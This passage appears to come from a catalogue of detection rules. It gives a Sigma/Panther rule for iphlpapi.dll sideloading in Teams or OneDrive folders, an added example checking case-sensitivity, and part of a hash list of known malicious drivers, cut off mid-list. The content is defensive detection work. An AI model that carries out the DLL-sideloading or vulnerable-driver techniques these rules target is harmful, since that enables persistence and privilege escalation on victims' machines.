Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications are installed. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded.
status test author frack113 id 1908fcc1-1b92-4272-8214-0fbaf2fa5163
panther query
def rule(event):
    if all(
        [
            "iphlpapi.dll" in event.deep_get("TargetFilename", default=""),
            "\\AppData\\Local\\Microsoft" in event.deep_get("TargetFilename", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious DLL File Dropped in the Teams or OneDrive Folder
id: 1908fcc1-1b92-4272-8214-0fbaf2fa5163
status: test
description: |
    Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications are installed.
    Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded.
references:
    - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/
author: frack113
date: 2022-08-12
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains|all:
            - 'iphlpapi.dll'
            - '\AppData\Local\Microsoft'
    condition: selection
falsepositives:
    - Unknown
level: high
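One thing to check before pasting the rendered query: Sigma's `contains` is case-insensitive by default, but the Python `in` test in the rendering above is not, so a file written as `IPHLPAPI.DLL` (same DLL-sideload primitive, different case) slips past the rendered rule while the Sigma rule as written would catch it. The following added example, not part of the original page or of the SigmaHQ/Panther rule, runs both readings over constructed file-event records; the user name and the Teams/OneDrive sub-paths are placeholders.

```python
# Needles from the rule's TargetFilename|contains|all selection.
NEEDLES = ["iphlpapi.dll", "\\AppData\\Local\\Microsoft"]


def rendered_rule(event: dict) -> bool:
    """Literal reading of the rendered query: case-sensitive substring tests."""
    target = event.get("TargetFilename", "")
    return all(n in target for n in NEEDLES)


def sigma_contains_all(value: str, needles: list) -> bool:
    """Sigma string matching is case-insensitive unless |cased is used,
    so both sides are folded before testing each needle."""
    folded = value.lower()
    return all(n.lower() in folded for n in needles)


def sigma_rule(event: dict) -> bool:
    return sigma_contains_all(event.get("TargetFilename", ""), NEEDLES)


# Constructed file_event records (not real telemetry).
SAMPLE_EVENTS = [
    # dropped beside Teams: both readings fire
    {"TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\Teams\\current\\iphlpapi.dll"},
    # same drop beside OneDrive with an upper-case file name: only the case-folded reading fires
    {"TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\IPHLPAPI.DLL"},
    # the legitimate system copy: neither fires (second needle absent)
    {"TargetFilename": "C:\\Windows\\System32\\iphlpapi.dll"},
]


def compare() -> list:
    """(rendered, sigma) verdict per sample event."""
    return [(rendered_rule(e), sigma_rule(e)) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for e, verdict in zip(SAMPLE_EVENTS, compare()):
        print(verdict, e["TargetFilename"])
```

If the deployed pipeline does not normalise path case before the rule runs, fold `TargetFilename` to lower case in the rendered query (and lower-case the needles) so the Panther rule keeps the Sigma semantics.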
high
Malicious Driver Load
Detects loading of known malicious drivers via their hash.
status test author Nasreddine Bencherchali (Nextron Systems) id 05296024-fe8a-4baf-8f3d-9a5f5624ceb2
panther query
def rule(event):
    if any(
        [
            "MD5=5be61a24f50eb4c94d98b8a82ef58dcf" in event.deep_get("Hashes", default=""),
            "MD5=d70a80fc73dd43469934a7b1cc623c76" in event.deep_get("Hashes", default=""),
            "MD5=3b71eab204a5f7ed77811e41fed73105" in event.deep_get("Hashes", default=""),
            "MD5=528ce5ce19eb34f401ef024de7ddf222" in event.deep_get("Hashes", default=""),
            "MD5=ae548418b491cd3f31618eb9e5730973" in event.deep_get("Hashes", default=""),
            "MD5=72f53f55898548767e0276c472be41e8" in event.deep_get("Hashes", default=""),
            "MD5=508faa4647f305a97ed7167abc4d1330" in event.deep_get("Hashes", default=""),
            "MD5=ed2b653d55c03f0bffa250372d682b75" in event.deep_get("Hashes", default=""),
            "MD5=0d2ba47286f1c68e87622b3a16bf9d92" in event.deep_get("Hashes", default=""),
            "MD5=3164bd6c12dd0fe1bdf3b833d56323b9" in event.deep_get("Hashes", default=""),
            "MD5=70fd7209ce5c013a1f9e699b5cc86cdc" in event.deep_get("Hashes", default=""),
            "MD5=c71be7b112059d2dc84c0f952e04e6cc" in event.deep_get("Hashes", default=""),
            "MD5=acac842a46f3501fe407b1db1b247a0b" in event.deep_get("Hashes", default=""),
            "MD5=01c2e4d8234258451083d6ce4e8910b7" in event.deep_get("Hashes", default=""),
            "MD5=c8541a9cef64589593e999968a0385b9" in event.deep_get("Hashes", default=""),
            "MD5=e172a38ade3aa0a2bc1bf9604a54a3b5" in event.deep_get("Hashes", default=""),
            "MD5=6fcf56f6ca3210ec397e55f727353c4a" in event.deep_get("Hashes", default=""),
            "MD5=2b80be31fbb11d4c1ef6d6a80b2e0c16" in event.deep_get("Hashes", default=""),
            "MD5=07056573d464b0f5284f7e3acedd4a3f" in event.deep_get("Hashes", default=""),
            "MD5=c7b7f1edb9bbef174e6506885561d85d" in event.deep_get("Hashes", default=""),
            "MD5=d5918d735a23f746f0e83f724c4f26e5" in event.deep_get("Hashes", default=""),
            "MD5=84763d8ca9fe5c3bff9667b2adf667de" in event.deep_get("Hashes", default=""),
            "MD5=fb593b1f1f80d20fc7f4b818065c64b6" in event.deep_get("Hashes", default=""),
            "MD5=909f3fc221acbe999483c87d9ead024a" in event.deep_get("Hashes", default=""),
            "MD5=e29f6311ae87542b3d693c1f38e4e3ad" in event.deep_get("Hashes", default=""),
            "MD5=aeb0801f22d71c7494e884d914446751" in event.deep_get("Hashes", default=""),
            "MD5=3f11a94f1ac5efdd19767c6976da9ba4" in event.deep_get("Hashes", default=""),
            "MD5=be6318413160e589080df02bb3ca6e6a" in event.deep_get("Hashes", default=""),
            "MD5=0b311af53d2f4f77d30f1aed709db257" in event.deep_get("Hashes", default=""),
            "MD5=d075d56dfce6b9b13484152b1ef40f93" in event.deep_get("Hashes", default=""),
            "MD5=27384ec4c634701012a2962c30badad2" in event.deep_get("Hashes", default=""),
            "MD5=5eb2c576597dd21a6b44557c237cf896" in event.deep_get("Hashes", default=""),
            "MD5=f56db4eba3829c0918413b5c0b42f00f" in event.deep_get("Hashes", default=""),
            "MD5=e27b2486aa5c256b662812b465b6036c" in event.deep_get("Hashes", default=""),
            "MD5=db86dfd7aefbb5be6728a63461b0f5f3" in event.deep_get("Hashes", default=""),
            "MD5=04a88f5974caa621cee18f34300fc08a" in event.deep_get("Hashes", default=""),
            "MD5=5129d8fd53d6a4aba81657ab2aa5d243" in event.deep_get("Hashes", default=""),
            "MD5=cd2c641788d5d125c316ed739c69bb59" in event.deep_get("Hashes", default=""),
            "MD5=7073cd0085fcba1cd7d3568f9e6d652c" in event.deep_get("Hashes", default=""),
            "MD5=24f0f2b4b3cdae11de1b81c537df41c7" in event.deep_get("Hashes", default=""),
            "MD5=88bea56ae9257b40063785cf47546024" in event.deep_get("Hashes", default=""),
            "MD5=63060b756377fce2ce4ab9d079ca732f" in event.deep_get("Hashes", default=""),
            "MD5=50b39072d0ee9af5ef4824eca34be6e3" in event.deep_get("Hashes", default=""),
            "MD5=57c18a8f5d1ba6d015e4d5bc698e3624" in event.deep_get("Hashes", default=""),
            "MD5=7d26985a5048bad57d9c223362f3d55c" in event.deep_get("Hashes", default=""),
            "MD5=ba54a0dbe2685e66e21d41b4529b3528" in event.deep_get("Hashes", default=""),
            "MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11" in event.deep_get("Hashes", default=""),
            "MD5=b52f51bbe6b49d0b475d943c29c4d4cb" in event.deep_get("Hashes", default=""),
            "MD5=a837302307dace2a00d07202b661bce2" in event.deep_get("Hashes", default=""),
            "MD5=78a122d926ccc371d60c861600c310f3" in event.deep_get("Hashes", default=""),
            "MD5=bdb305aa0806f8b38b7ce43c927fe919" in event.deep_get("Hashes", default=""),
            "MD5=27053e964667318e1b370150cbca9138" in event.deep_get("Hashes", default=""),
            "MD5=6a4fbcfb44717eae2145c761c1c99b6a" in event.deep_get("Hashes", default=""),
            "MD5=d13c1b76b4a1ca3ff5ab63678b51df6d" in event.deep_get("Hashes", default=""),
            "MD5=6a066d2be83cf83f343d0550b0b8f206" in event.deep_get("Hashes", default=""),
            "MD5=7108b0d4021af4c41de2c223319cd4c1" in event.deep_get("Hashes", default=""),
            "MD5=1cd158a64f3d886357535382a6fdad75" in event.deep_get("Hashes", default=""),
            "MD5=e939448b28a4edc81f1f974cebf6e7d2" in event.deep_get("Hashes", default=""),
            "MD5=4198d3db44d7c4b3ba9072d258a4fc2d" in event.deep_get("Hashes", default=""),
            "MD5=4a27a2bdc6fbe39eeec6455fb1e0ef20" in event.deep_get("Hashes", default=""),
            "MD5=30ca3cc19f001a8f12c619daa8c6b6e3" in event.deep_get("Hashes", default=""),
            "MD5=fe9004353b25640f6a879e57f07122d7" in event.deep_get("Hashes", default=""),
            "MD5=06c7fcf3523235cf52b3eee083ec07b2" in event.deep_get("Hashes", default=""),
            "MD5=364605ad21b9275681cffef607fac273" in event.deep_get("Hashes", default=""),
            "MD5=968ddb06af90ef83c5f20fbdd4eee62e" in event.deep_get("Hashes", default=""),
            "MD5=ba50bd645d7c81416bb26a9d39998296" in event.deep_get("Hashes", default=""),
            "MD5=29e03f4811b64969e48a99300978f58c" in event.deep_get("Hashes", default=""),
            "MD5=b0770094c3c64250167b55e4db850c04" in event.deep_get("Hashes", default=""),
            "MD5=40b968ecdbe9e967d92c5da51c390eee" in event.deep_get("Hashes", default=""),
            "MD5=b6b530dd25c5eb66499968ec82e8791e" in event.deep_get("Hashes", default=""),
            "MD5=f209cb0e468ca0b76d879859d5c8c54e" in event.deep_get("Hashes", default=""),
            "MD5=76f8607fc4fb9e828d613a7214436b66" in event.deep_get("Hashes", default=""),
            "MD5=4b058945c9f2b8d8ebc485add1101ba5" in event.deep_get("Hashes", default=""),
            "MD5=faae7f5f69fde12303dd1c0c816b72b7" in event.deep_get("Hashes", default=""),
            "MD5=89d294ef7fefcdf1a6ca0ab96a856f57" in event.deep_get("Hashes", default=""),
            "MD5=ef0e1725aaf0c6c972593f860531a2ea" in event.deep_get("Hashes", default=""),
            "MD5=bbdbffebfc753b11897de2da7c9912a5" in event.deep_get("Hashes", default=""),
            "MD5=5ebfc0af031130ba9de1d5d3275734b3" in event.deep_get("Hashes", default=""),
            "MD5=22949977ce5cd96ba674b403a9c81285" in event.deep_get("Hashes", default=""),
            "MD5=77cfd3943cc34d9f5279c330cd8940bc" in event.deep_get("Hashes", default=""),
            "MD5=311de109df18e485d4a626b5dbe19bc6" in event.deep_get("Hashes", default=""),
            "MD5=2730cc25ad385acc7213a1261b21c12d" in event.deep_get("Hashes", default=""),
            "MD5=87dc81ebe85f20c1a7970e495a778e60" in event.deep_get("Hashes", default=""),
            "MD5=154b45f072fe844676e6970612fd39c7" in event.deep_get("Hashes", default=""),
            "MD5=5a4fe297c7d42539303137b6d75b150d" in event.deep_get("Hashes", default=""),
            "MD5=d6a1dd7b2c06f058b408b3613c13d413" in event.deep_get("Hashes", default=""),
            "MD5=a6e9d6505f6d2326a8a9214667c61c67" in event.deep_get("Hashes", default=""),
            "MD5=7fad9f2ef803496f482ce4728578a57a" in event.deep_get("Hashes", default=""),
            "MD5=5076fba3d90e346fd17f78db0a4aa12c" in event.deep_get("Hashes", default=""),
            "MD5=79df0eabbf2895e4e2dae15a4772868c" in event.deep_get("Hashes", default=""),
            "MD5=14580bd59c55185115fd3abe73b016a2" in event.deep_get("Hashes", default=""),
            "MD5=1f2888e57fdd6aee466962c25ba7d62d" in event.deep_get("Hashes", default=""),
            "MD5=5e9231e85cecfc6141e3644fda12a734" in event.deep_get("Hashes", default=""),
            "MD5=dc564bac7258e16627b9de0ce39fae25" in event.deep_get("Hashes", default=""),
            "MD5=4e4c068c06331130334f23957fca9e3c" in event.deep_get("Hashes", default=""),
            "MD5=1ee9f6326649cd23381eb9d7dfdeddf7" in event.deep_get("Hashes", default=""),
            "MD5=4e1f656001af3677856f664e96282a6f" in event.deep_get("Hashes", default=""),
            "MD5=36f44643178c505ea0384e0fb241e904" in event.deep_get("Hashes", default=""),
            "MD5=6b480fac7caca2f85be9a0cfe79aedfc" in event.deep_get("Hashes", default=""),
            "MD5=c1ab425977d467b64f437a6c5ad82b44" in event.deep_get("Hashes", default=""),
            "MD5=fe508caa54ffeb2285d9f00df547fe4a" in event.deep_get("Hashes", default=""),
            "MD5=d3af70287de8757cebc6f8d45bb21a20" in event.deep_get("Hashes", default=""),
            "MD5=990b949894b7dc82a8cf1131b063cb1a" in event.deep_get("Hashes", default=""),
            "MD5=c62209b8a5daf3f32ad876ad6cefda1b" in event.deep_get("Hashes", default=""),
            "MD5=c159fb0f345a8771e56aab8e16927361" in event.deep_get("Hashes", default=""),
            "MD5=19b15eeccab0752c6793f782ca665a45" in event.deep_get("Hashes", default=""),
            "MD5=1d51029dfbd616bf121b40a0d1efeb10" in event.deep_get("Hashes", default=""),
            "MD5=157a22689629ec876337f5f9409918d5" in event.deep_get("Hashes", default=""),
            "MD5=3dd829fb27353622eff34be1eabb8f18" in event.deep_get("Hashes", default=""),
            "MD5=8636fe3724f2bcba9399daffd6ef3c7e" in event.deep_get("Hashes", default=""),
            "MD5=3d0b3e19262099ade884b75ba86ca7e8" in event.deep_get("Hashes", default=""),
            "MD5=97539c78d6e2b5356ce79e40bcd4d570" in event.deep_get("Hashes", default=""),
            "MD5=0308b6888e0f197db6704ca20203eee4" in event.deep_get("Hashes", default=""),
            "MD5=091a6bd4880048514c5dd3bede15eba5" in event.deep_get("Hashes", default=""),
            "MD5=7e92f98b809430622b04e88441b2eb04" in event.deep_get("Hashes", default=""),
            "MD5=bb5bda8889d8d27ef984dbd6ad82c946" in event.deep_get("Hashes", default=""),
            "MD5=b76aee508f68b5b6dccd6e1f66f4cf8b" in event.deep_get("Hashes", default=""),
            "MD5=a822b9e6eedf69211013e192967bf523" in event.deep_get("Hashes", default=""),
            "MD5=df52f8a85eb64bc69039243d9680d8e4" in event.deep_get("Hashes", default=""),
            "MD5=bfbdea0589fb77c7a7095cf5cd6e8b7a" in event.deep_get("Hashes", default=""),
            "MD5=44857ca402a15ab51dc5afe47abdfa44" in event.deep_get("Hashes", default=""),
            "MD5=f9844524fb0009e5b784c21c7bad4220" in event.deep_get("Hashes", default=""),
            "MD5=d34b218c386bfe8b1f9c941e374418d7" in event.deep_get("Hashes", default=""),
            "MD5=0ca010a32a9b0aeae1e46d666b83b659" in event.deep_get("Hashes", default=""),
            "MD5=93496a436c5546156a69deb255a9fed0" in event.deep_get("Hashes", default=""),
            "MD5=1cd5e231064e03c596e819b6ff48daf9" in event.deep_get("Hashes", default=""),
            "MD5=70a71fe86df717ac59dbf856d7ac5789" in event.deep_get("Hashes", default=""),
            "MD5=a33089d4e50f7d2ea8b52ca95d26ebf3" in event.deep_get("Hashes", default=""),
            "MD5=e0cc9b415d884f85c45be145872892b8" in event.deep_get("Hashes", default=""),
            "MD5=a42249a046182aaaf3a7a7db98bfa69d" in event.deep_get("Hashes", default=""),
            "MD5=c5ae6ca044bd03c3506c132b033be1dc" in event.deep_get("Hashes", default=""),
            "MD5=7ebe606acd81abf1f8cb0767c974164b" in event.deep_get("Hashes", default=""),
            "MD5=b5dcc869a91efcc6e8ea0c3c07605d63" in event.deep_get("Hashes", default=""),
            "MD5=62c18d61ed324088f963510bae43b831" in event.deep_get("Hashes", default=""),
            "MD5=093a2a635c3a27aac50efd6463f4efa1" in event.deep_get("Hashes", default=""),
            "MD5=28102acca39ad0199f262ba9958be3f4" in event.deep_get("Hashes", default=""),
            "MD5=650ef9dd70cb192027e536754d6e0f63" in event.deep_get("Hashes", default=""),
            "MD5=32eb3d2bf2c5b3da2d2a1f20fffbac44" in event.deep_get("Hashes", default=""),
            "MD5=6771b13a53b9c7449d4891e427735ea2" in event.deep_get("Hashes", default=""),
            "MD5=072ba2309b825ce1dba37d8d924ea8ed" in event.deep_get("Hashes", default=""),
            "MD5=2d37d2fb9b9f8ac52bc02cba4487e3cb" in event.deep_get("Hashes", default=""),
            "MD5=1325ec39e98225e487b40043faee8052" in event.deep_get("Hashes", default=""),
            "MD5=4484f4007de2c3ee4581a2cff77ca3b4" in event.deep_get("Hashes", default=""),
            "MD5=a236e7d654cd932b7d11cb604629a2d0" in event.deep_get("Hashes", default=""),
            "MD5=17509f0a98dc5c5d52c3f9ac1428a21b" in event.deep_get("Hashes", default=""),
            "MD5=840a5edf2534dd23a082cf7b28cbfc4d" in event.deep_get("Hashes", default=""),
            "MD5=77a7ed4798d02ef6636cd0fd07fc382a" in event.deep_get("Hashes", default=""),
            "MD5=a9df5964635ef8bd567ae487c3d214c4" in event.deep_get("Hashes", default=""),
            "MD5=8b75047199825c8e62fdcc1c915db8bd" in event.deep_get("Hashes", default=""),
            "MD5=d416494232c4197cb36a914df2e17677" in event.deep_get("Hashes", default=""),
            "MD5=4cf14a96485a1270fed97bb8000e4f86" in event.deep_get("Hashes", default=""),
            "MD5=35e512f9bedc89dca5ce81f35820714c" in event.deep_get("Hashes", default=""),
            "MD5=40f35792e7565aa047796758a3ce1b77" in event.deep_get("Hashes", default=""),
            "MD5=f7f31bccc9b7b2964ac85106831022b1" in event.deep_get("Hashes", default=""),
            "MD5=26aedc10d4215ba997495d3a68355f4a" in event.deep_get("Hashes", default=""),
            "MD5=10f3679384a03cb487bda9621ceb5f90" in event.deep_get("Hashes", default=""),
            "MD5=80219fb6b5954c33e16bac5ecdac651b" in event.deep_get("Hashes", default=""),
            "MD5=cee36b5c6362993fa921435979bfbe4a" in event.deep_get("Hashes", default=""),
            "MD5=e37a08f516b8a7ca64163f5d9e68fe5a" in event.deep_get("Hashes", default=""),
            "MD5=49518f7375a5f995ebe9423d8f19cfe4" in event.deep_get("Hashes", default=""),
            "MD5=920df6e42cf91bbe19707f5a86e3c5c5" in event.deep_get("Hashes", default=""),
            "MD5=2ec877e425bd7eddb663627216e3491e" in event.deep_get("Hashes", default=""),
            "MD5=550b7991d93534bc510bc4f237155a7a" in event.deep_get("Hashes", default=""),
            "MD5=98d53f6b3bec0a3417a04fbb9e17fa06" in event.deep_get("Hashes", default=""),
            "MD5=13a57a4ef721440c7c9208b51f7c05de" in event.deep_get("Hashes", default=""),
            "MD5=c5fc3605194e033bdf3781ff2adaeb61" in event.deep_get("Hashes", default=""),
            "MD5=6e625ec04c20a9dbd48c7060efbf5e92" in event.deep_get("Hashes", default=""),
            "MD5=0b9b78d1281c7d4ab50497cf6ea7452a" in event.deep_get("Hashes", default=""),
            "MD5=4e906fcb13e2793c98f47291fd69391b" in event.deep_get("Hashes", default=""),
            "MD5=2bb353891d65c9e267eb98a3a2b694c3" in event.deep_get("Hashes", default=""),
            "MD5=7d86cdda7f49f91fdb69901a002b34e7" in event.deep_get("Hashes", default=""),
            "MD5=f69b06ca7c34d16f26ea1c6861edf62a" in event.deep_get("Hashes", default=""),
            "MD5=ee6b1a79cb6641aa44c762ee90786fe0" in event.deep_get("Hashes", default=""),
            "MD5=1fc7aeeff3ab19004d2e53eae8160ab1" in event.deep_get("Hashes", default=""),
            "MD5=24d3ea54f25e32832ac20335a1ce1062" in event.deep_get("Hashes", default=""),
            "MD5=c94f405c5929cfcccc8ad00b42c95083" in event.deep_get("Hashes", default=""),
            "MD5=b164daf106566f444dfb280d743bc2f7" in event.deep_get("Hashes", default=""),
            "MD5=93130909e562925597110a617f05e2a9" in event.deep_get("Hashes", default=""),
            "MD5=f589d4bf547c140b6ec8a511ea47c658" in event.deep_get("Hashes", default=""),
            "MD5=bf445ac375977ecf551bc2a912c58e8a" in event.deep_get("Hashes", default=""),
            "MD5=629ee55e4b5a225d048fbcd5f0a1d18b" in event.deep_get("Hashes", default=""),
            "MD5=0023ca0ca16a62d93ef51f3df98b2f94" in event.deep_get("Hashes", default=""),
            "MD5=a3d69c7e24300389b56782aa63b0e357" in event.deep_get("Hashes", default=""),
            "MD5=cbd8d370462503508e44dba023bdf9bc" in event.deep_get("Hashes", default=""),
            "MD5=67daa04716803a15fc11c9e353d77c2f" in event.deep_get("Hashes", default=""),
            "MD5=c9d4214c850e0cedf033dc8f0cd3aace" in event.deep_get("Hashes", default=""),
            "MD5=bd5b0514f3b40f139d8079138d01b5f6" in event.deep_get("Hashes", default=""),
            "MD5=19bdd9b799e3c2c54c0d7fff68b31c20" in event.deep_get("Hashes", default=""),
            "MD5=f242cffd9926c0ccf94af3bf16b6e527" in event.deep_get("Hashes", default=""),
            "MD5=5aeab9427d85951def146b4c0a44fc63" in event.deep_get("Hashes", default=""),
            "MD5=40170485cca576adb5266cf5b0d3b0bd" in event.deep_get("Hashes", default=""),
            "MD5=c277c4386a78fae1b7e17eaecf4f472b" in event.deep_get("Hashes", default=""),
            "MD5=58c37866cbc3d1338e4fc58ada924ffe" in event.deep_get("Hashes", default=""),
            "MD5=0f16a43f7989034641fd2de3eb268bf1" in event.deep_get("Hashes", default=""),
            "MD5=0ae30291c6cbfa7be39320badd6e8de0" in event.deep_get("Hashes", default=""),
            "MD5=05dd59bd4f175304480affd8f1305c37" in event.deep_get("Hashes", default=""),
            "MD5=f838f4eb36f1e7036238776c7a70f0b0" in event.deep_get("Hashes", default=""),
            "MD5=85093bb9f027027c2c61aee50796de30" in event.deep_get("Hashes", default=""),
            "MD5=ae338d91d1b05a72559b7f6ed717362d" in event.deep_get("Hashes", default=""),
            "MD5=bd91787b5dcb2189b856804e85dfa1d9" in event.deep_get("Hashes", default=""),
            "MD5=6b3c1511e12f4d27a4ea3b18020d7b84" in event.deep_get("Hashes", default=""),
            "MD5=97264fd62d4907bdac917917a07b3b7a" in event.deep_get("Hashes", default=""),
            "MD5=6ececf26ff8b03ed7ffbddadec9a9dab" in event.deep_get("Hashes", default=""),
            "MD5=47e6ac52431ca47da17248d80bf71389" in event.deep_get("Hashes", default=""),
            "MD5=eb57f03b7603f0b235af62e8cd5be8c2" in event.deep_get("Hashes", default=""),
            "MD5=e1a9aa4c14669b1fb1f67a7266f87e82" in event.deep_get("Hashes", default=""),
            "MD5=29047f0b7790e524b09a06852d31a117" in event.deep_get("Hashes", default=""),
            "MD5=4dd6250eb2d368f500949952eb013964" in event.deep_get("Hashes", default=""),
            "MD5=fb7c61ef427f9b2fdff3574ee6b1819b" in event.deep_get("Hashes", default=""),
            "MD5=844af8c877f5da723c1b82cf6e213fc1" in event.deep_get("Hashes", default=""),
            "MD5=e39152eadd76751b1d7485231b280948" in event.deep_get("Hashes", default=""),
            "MD5=ac6e29f535b2c42999c50d2fc32f2c9c" in event.deep_get("Hashes", default=""),
            "MD5=2406ea37152d2154be3fef6d69ada2c6" in event.deep_get("Hashes", default=""),
            "MD5=0ea8389589c603a8b05146bd06020597" in event.deep_get("Hashes", default=""),
            "MD5=754e21482baf18b8b0ed0f4be462ba03" in event.deep_get("Hashes", default=""),
            "MD5=c4a517a02ba9f6eac5cf06e3629cc076" in event.deep_get("Hashes", default=""),
            "MD5=32282e07db321e8d7849f2287bb6a14f" in event.deep_get("Hashes", default=""),
            "MD5=32b67a6cd6dd998b9f563ed13d54a8bc" in event.deep_get("Hashes", default=""),
            "MD5=3359e1d4244a7d724949c63e89689ef8" in event.deep_get("Hashes", default=""),
            "MD5=5917e415a5bf30b3fcbcbcb8a4f20ee0" in event.deep_get("Hashes", default=""),
            "MD5=0bdd51cc33e88b5265dfb7d88c5dc8d6" in event.deep_get("Hashes", default=""),
            "MD5=a90236e4962620949b720f647a91f101" in event.deep_get("Hashes", default=""),
            "MD5=ccde8c94439f9fc9c42761e4b9a23d97" in event.deep_get("Hashes", default=""),
            "MD5=68caf620ef8deaf06819cf8c80d3367b" in event.deep_get("Hashes", default=""),
            "MD5=5fec28e8f4f76e5ede24beb32a32b9d7" in event.deep_get("Hashes", default=""),
            "MD5=e8eac6642b882a6196555539149c73f2" in event.deep_get("Hashes", default=""),
            "MD5=aa98b95f5cbae8260122de06a215ee10" in event.deep_get("Hashes", default=""),
            "MD5=a5bcaa2fc87b42e2e5d62a2e5dfcbc80" in event.deep_get("Hashes", default=""),
            "MD5=abc168fdca7169bf9dc40cec9761018d" in event.deep_get("Hashes", default=""),
            "MD5=7f9309f5e4defec132b622fadbcad511" in event.deep_get("Hashes", default=""),
            "MD5=4748696211bd56c2d93c21cab91e82a5" in event.deep_get("Hashes", default=""),
            "MD5=48394dce30bb8da5ae089cb8f41b86dc" in event.deep_get("Hashes", default=""),
            "MD5=65f800e1112864bf41eb815649f428d5" in event.deep_get("Hashes", default=""),
            "MD5=bd25be845c151370ff177509d95d5add" in event.deep_get("Hashes", default=""),
            "MD5=a37ed7663073319d02f2513575a22995" in event.deep_get("Hashes", default=""),
            "MD5=2c39f6172fbc967844cac12d7ab2fa55" in event.deep_get("Hashes", default=""),
            "MD5=491aec2249ad8e2020f9f9b559ab68a8" in event.deep_get("Hashes", default=""),
            "MD5=1e0eb80347e723fa31fce2abb0301d44" in event.deep_get("Hashes", default=""),
            "MD5=a26363e7b02b13f2b8d697abb90cd5c3" in event.deep_get("Hashes", default=""),
            "MD5=4118b86e490aed091b1a219dba45f332" in event.deep_get("Hashes", default=""),
            "MD5=6d131a7462e568213b44ef69156f10a5" in event.deep_get("Hashes", default=""),
            "MD5=10c2ea775c9e76e7774ab89e38f38287" in event.deep_get("Hashes", default=""),
            "SHA1=994e3f5dd082f5d82f9cc84108a60d359910ba79" in event.deep_get("Hashes", default=""),
            "SHA1=4f7989ad92b8c47c004d3731b7602ce0934d7a23" in event.deep_get("Hashes", default=""),
            "SHA1=f2fe02e28cf418d935ec63168caf4dff6a9fbdfe" in event.deep_get("Hashes", default=""),
            "SHA1=af42afda54d150810a60baa7987f9f09d49d1317" in event.deep_get("Hashes", default=""),
            "SHA1=09375f13521fc0cacf2cf0a28b2a9248f71498d7" in event.deep_get("Hashes", default=""),
            "SHA1=c75e8fceed74a4024d38ca7002d42e1ecf982462" in event.deep_get("Hashes", default=""),
            "SHA1=03e82eae4d8b155e22ffdafe7ba0c4ab74e8c1a7" in event.deep_get("Hashes", default=""),
            "SHA1=e730eb971ecb493b69de2308b6412836303f733a" in event.deep_get("Hashes", default=""),
            "SHA1=6a95860594cd8b7e3636bafa8f812e05359a64ca" in event.deep_get("Hashes", default=""),
            "SHA1=5fef884a901e81ac173d63ade3f5c51694decf74" in event.deep_get("Hashes", default=""),
            "SHA1=a8ddb7565b61bc021cd2543a137e00627f999dcc" in event.deep_get("Hashes", default=""),
            "SHA1=6451522b1fb428e549976d0742df5034f8124b17" in event.deep_get("Hashes", default=""),
            "SHA1=8ad0919629731b9a8062f7d3d4a727b28f22e81a" in event.deep_get("Hashes", default=""),
            "SHA1=cc65bf60600b64feece5575f21ab89e03a728332" in event.deep_get("Hashes", default=""),
            "SHA1=bbc8bd714c917bb1033f37e4808b4b002cd04166" in event.deep_get("Hashes", default=""),
            "SHA1=4f2d9a70ea24121ae01df8a76ffba1f9cc0fde4a" in event.deep_get("Hashes", default=""),
            "SHA1=f6a18fc9c4abe4a82c1ab28abc0a7259df8de7a3" in event.deep_get("Hashes", default=""),
            "SHA1=c42178977bd7bbefe084da0129ed808cb7266204" in event.deep_get("Hashes", default=""),
            "SHA1=766949d4599fbf8f45e888c9d6fedf21e04fb333" in event.deep_get("Hashes", default=""),
            "SHA1=b7ff8536553cb236ea2607941e634b23aadb59ee" in event.deep_get("Hashes", default=""),
            "SHA1=76789196eebfd4203f477a5a6c75eefc12d9a837" in event.deep_get("Hashes", default=""),
            "SHA1=e5566684a9e0c1afadae80c3a8be6636f6cad7cf" in event.deep_get("Hashes", default=""),
            "SHA1=7638c048af5beae44352764390deea597cc3e7b1" in event.deep_get("Hashes", default=""),
            "SHA1=6a6fe0d69e0ea34d695c3b525e6db639f9ad6ac5" in event.deep_get("Hashes", default=""),
            "SHA1=08dd35dde6187af579a1210e00eadbcea29e66d2" in event.deep_get("Hashes", default=""),
            "SHA1=9ee31f1f25f675a12b7bad386244a9fbfa786a87" in event.deep_get("Hashes", default=""),
            "SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e" in event.deep_get("Hashes", default=""),
            "SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d" in event.deep_get("Hashes", default=""),
            "SHA1=505546d82aab56889a923004654b9afdec54efe6" in event.deep_get("Hashes", default=""),
            "SHA1=0fe2d22bd2e6b7874f4f2b6279e2ca05edd1222a" in event.deep_get("Hashes", default=""),
            "SHA1=8aa0e832e5ca2eb79dafabadbe9948a191008383" in event.deep_get("Hashes", default=""),
            "SHA1=844d7bcd1a928d340255ff42971cca6244a459bf" in event.deep_get("Hashes", default=""),
            "SHA1=9e2ebc489c50b6bbae3b08473e007baa65ff208f" in event.deep_get("Hashes", default=""),
            "SHA1=7e836dadc2e149a0b758c7e22c989cbfcce18684" in event.deep_get("Hashes", default=""),
            "SHA1=2480549ec8564cd37519a419ab2380cf3e8bab9e" in event.deep_get("Hashes", default=""),
            "SHA1=8b9dd4c001f17e7835fdaf0d87a2f3e026557e84" in event.deep_get("Hashes", default=""),
            "SHA1=d3f6c3ea2ef7124403c0fb6e7e3a0558729b5285" in event.deep_get("Hashes", default=""),
            "SHA1=40df7a55c200371853cc3fd3cc03b5ac932f5cd6" in event.deep_get("Hashes", default=""),
            "SHA1=607387cc90b93d58d6c9a432340261fde846b1d9" in event.deep_get("Hashes", default=""),
            "SHA1=2779c54ccd1c008cd80e88c2b454d76f4fa18c07" in event.deep_get("Hashes", default=""),
            "SHA1=46c9a474a1a62c25a05bc7661b75a80b471616e6" in event.deep_get("Hashes", default=""),
